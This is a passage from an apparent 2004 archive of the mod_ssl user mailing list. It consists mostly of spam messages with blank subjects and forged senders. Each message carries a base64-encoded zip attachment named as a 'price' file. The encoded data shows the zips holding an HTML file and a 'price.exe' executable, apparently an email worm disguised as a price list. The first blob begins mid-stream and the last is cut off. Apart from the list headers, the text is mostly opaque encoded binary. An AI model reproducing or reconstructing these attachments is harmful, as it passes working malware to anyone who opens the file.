NbhL+XzbPjq6WHwDsfjWYVNQC64YSN98nTEDibTVGc+asuVoDIlGlvRSg873fJHfUPR4tk3N
hVuLl8I4JOv/wbG8U1YfpxF3E7kzeb5TczlB8g2bDZaTjZTB0w0zqG2yKSX/zc3FzxqCr874
Jt12IPvxM5htPGt6B9m+rIprChLj9xxpU90+4tej7z2S89gM002X2mduQrTGQWqXdBNqmxeg
7j3I4vuO2luMt0jWtfG/L7X4RuO8QOtDttEjKxpNm66Ycau4KxErO08ilwicmPKS5msEhU99
KZ9fJ318OiZ1+dox04T+qZp1MRue/+sgCDk6yNBAfy8bNQ0ofpD5RkA82ygx05/B2e5ePn7+
7z5Z2ktzXj5j62UYRZ4uvjhLqQXPcQdZkW/PoIUDm9NdXTbgEFKKQfoZK3rWAllcwaVIzY4W
3TGQm4VtYWNV+swRtmQ3DdC87sCSs9Qu68qZrVjv2dQ3kB5O9fdL6V1pkhocyvSmBtMDoga7
H7PE3ZZTcfae+Qy++ofmu/UODKdvGMoM+zyGBrf3bh/eJirbhjKbB1K9aVHZPjSY2Z4dFN99
PdnsUCazbaGGyoYuUUlne1LbtgSV1M5dO4ZSAzWEoMtiUVN+ZUGAwYFUz5laLbGGX2rnMCjQ
m1/JoCI+ezb1pYZ6+/xxavoumszWnhoK0VzX+ty111oMzplSW1LptXGpYOXnCXY8GU+G0UWc
Ly4rVphke4sppZKcDyFhUaUOKV+SRrRYkVHDDDGkZVnV5TA3GAX8UwjNDDg2m8Vy1MZXiJvK
xnGEUVMa6cCQ7mi9do4mq0VNDg/gyIpN1RC6WLHomB5uPjo6KuVl0y3SGPe3CiuF6SXFUTRT
ppYF721Gt7GZYVDTsXRqjOt2kRohiTs6E1JHe1yKx9dLia4ltA1JqSMuJTZI8euW6N9zYjdT
PUIyg7nYcxVJ6+gIzUqj9jjLS4ojeaYew7qq8BN2PiRTRc57sl0Ej/YQj3hHp9Sxfj3k2iBd
F19MczVmW1Rlkucs0f54SXKKSwSVbSfmSBacjOxKboyZ3ARCsnAtmiwm5/R4e3tnJLmklii3
NWbnl2gpp8fQKxGmOKxM5UhmFrPdMKUku+MQL48NFdK4xRRmhvcNkC6W36UwEv1LHnXCm8iA
86pIFjYEdqrDOUdsjBIM3wsTgM9Db1GGa1F7BEFDXrcNR4L5LhXXhj5LsgmNhYgKt1cYs6yH
acyzlUJ4+iOI/6QcdcTx4VY05kRYpWPIZdnWiyF5YX9mvCjplmepiHAi1KvINtYxvKGtXA6n
VJihbkbs/pynGyq4LyVYNnNpmAnXYsaQK5tt5plhr6FQYaqy7epKeFl557OQDBlBppCnDhm2
RpVod+LAl+jRJGaoLoJBG16XRbeoMC/nVUw2GiYnE1IyLnVch9KxPtzTlSsGdcLdVKbmqash
P7Fp9JggWsxBaFGmjq5SNuLw/RXBijfO2Wji6KbtOQ6MM2xpsg7Hxn8UGWG2QsMWKoxfLo5S
O7ykGjYMnA0bYcxF1mJEL5tZ1KMpqoq43o7YTi4cJXOwlaPFybG8EXU4KDik8lSishO9h12u
1Bh2FRY0fIqK4wmG5GAf8xArssE41Z1oE8QiOCxXj2sZOVZ4SNkYEWkWsir4KzmsJerZrKwz
zFapYwyjNGezusdpWbfdEi3loqk64su8WbdrWfaPgGg9GHzQyFV16ncrU1OlY5EkbH83JlxA
yJ/oYzjjFSbpRsQ5pRthP67SsuTqxShPLfpAciuCFwyDjsghUlEeKQLrmcXobraX04uIv6Jo
JmWBuYWo1KZGB1+/WN7G+teR1fU0+L1oGmKpCgZWqKUUIs4dsRhySfi20PBl3ZIss44iINS4
Ktsl+IvxJQZZMrF/KhI3HhiuHp6XqdMcCwsDLTAT/axQBweOGZF1jo1FymJp+RCeSzE+LtHg
xI1cFGp5OUMvRlMdpGBwh/XmX7+zq+oxnF/cPTAIHW5QvyvfbcWIlTiLLBjGxtEF9/k/6CR2
tuGJuxpdKupK0YnBq9WxD90o13F1FdlWEHtEOzvFCEcP/i6mPLaKcGVwCTmDSfzIwC73xuq5
JD7nSm4EIXfkADBNi4fRkcsmj8AeQjabx3KVuGMZ9WKjOg/EFEleGsDZ4xRuWo25lTxTTT08
wPtoketAWusYnuUUJUfVJbfuBlN0WdEYC9EURHSGjjRMRoTU5UXryKQj3I5C62kjgYEbMWSX
D2uUwz21fDhJFY5ExxFUjh4NZyHDPo85rue6ee6LlnLwDFfn8VWMB6wxLa9J7aVKhLlVTNMp
yKUS7A0xQ47Jtup0rI8etUBHdUfLY7FCaYaYiKwUY3kKesxGLhAV/IiYeRRBCffq1BWmHGr0
JQ+hqiPlYOrCzUZrQDZNWDUyK5OqwdqYUU6lkOfXyiqVjQh5cNLLJtbdgFCOhrTHZaYVGdeL
EEfHmWDK0HfJEzqQTGvJ/BxbGtcsQQv5DVsuU8MXhIeICGes6HG03HjMtEcjrUIfkWN5D935
2esVozYrfIfDoBFXN+sEyFzEvFqJctNihXKwWRwpzihFyhBOA7HOch4rhKQa3g6TBTXiQJdd
TSqyHI15fHNHNSnGi7Klc8cUHVPL5jiMSTdjjhapjFHZGqmjwrzNj3g45IhEizdAYJ2LivRF
huFo8Gh17jm8Ui5Pw0mw77cVN5oChWrUjrgOEsOVTD0qI/ajY4NGxl9ivIpZJ27LY0fLUrmS
44a4tIHJ+DFkSEV4NRM2j0goWmjZcLGIyIbr6EmcC0gzVLc+g3oBqUktG7Yc1oilMSgxz+x6
PeUifF84U0WyZLD82WJgR3Vkr84CcSWI6UQPWUZUF30DwWwnOqp2ZVaKKfBL0Zcv/s0FPCqt
Y/xlG9ssOj4AkkevdSzbyusWle0odyf4Ksx0WL0sTlFySBsVuRThmrhriHdKusUQJtfdIDh2
YLPIa0vCR0SLSKFpBwllpOa6OtrDt3FikercXwphogjIKWSF1l3WnF5xoq9E+FVPjM8kejwc
v9HmoGgwv+joDGeZm5BVnMvROuEnGBtRcAxFBBHUkCuSOMgieReRIRkM7tymTv1bB4oQSAeX
CD1VbJc5CrPrHEiypUVc6M67AMPgf5lrlJWIjjmFX3Tka9aN7L5D/JTBLGp+4B+AWv2/b720
PdX+bHxj53OdP+l8s3N5oi3x2cS1iQ2JbYlsYjLxrcSfJh5KPJp4MvEPiX9KnEicTJxOvJv4
pa4NXZu7Ml27uu7pmu76YdeRrh93Hev6WderXa93nep6u2u2qzHZnFyZXJVck2xLXpW8JhlP
rk9+PtmbvDGZSe5M7k7mklrSTLrJ8eQHnsfHz8/1CBvKbt80OJwaSO/eqis2c9iIuzv4SX93
8AcBO+FsdGbuHvCCH4r3DtpyZdhUyaKf8hf9prdTt10v+AuA9Nh8lf8JAGr+XyoM0BJb+PsF
8aN78MvfVhDsyoetnI/0819QSwECFAAUAAAACADUgQkxNwKtUgkCAAA+BAAACgAAAAAAAAAB
ACAAgIEAAAAAcHJpY2UuaHRtbFBLAQIUAAoAAAAAAHQ5CTEAAAAAAAAAAAAAAAAGAAAAAAAA
AAAAEADAQTECAABwcmljZS9QSwECFAAUAAAACAAOggkxnAUjyesTAAAAOgAADwAAAAAAAAAA
ACIAwIFVAgAAcHJpY2UvcHJpY2UuZXhlUEsFBgAAAAADAAMAqQAAAG0WAAAAAA==

----------bjuxgnzrtifaxtbbaqqp--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 21:29:26 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EB0B1A8CD1; Mon,  9 Aug 2004 21:29:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from IBM-BUTLERVL.net (bi01p1.co.us.ibm.com [32.97.110.142])
	by master.modssl.org (Postfix) with SMTP id 2DBA7A8A4D
	for ; Mon,  9 Aug 2004 21:29:24 +0200 (CEST)
Date: Mon, 09 Aug 2004 14:27:47 -0600
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------ducewiiabccbwtayopid"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------ducewiiabccbwtayopid
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


 price







----------ducewiiabccbwtayopid
Content-Type: application/octet-stream; name="price_new.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="price_new.zip"

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

----------ducewiiabccbwtayopid--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 21:32:18 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4011DA8CEA; Mon,  9 Aug 2004 21:32:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rxu-l1.org (adsl-67-122-116-206.dsl.sntc01.pacbell.net [67.122.116.206])
	by master.modssl.org (Postfix) with SMTP id 2DA7BA8A81
	for ; Mon,  9 Aug 2004 21:32:13 +0200 (CEST)
Date: Mon, 09 Aug 2004 12:31:27 -0800
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------qnnmvqoanxxjyxomowkw"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------qnnmvqoanxxjyxomowkw
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


new price







----------qnnmvqoanxxjyxomowkw
Content-Type: application/octet-stream; name="new__price.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="new__price.zip"

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
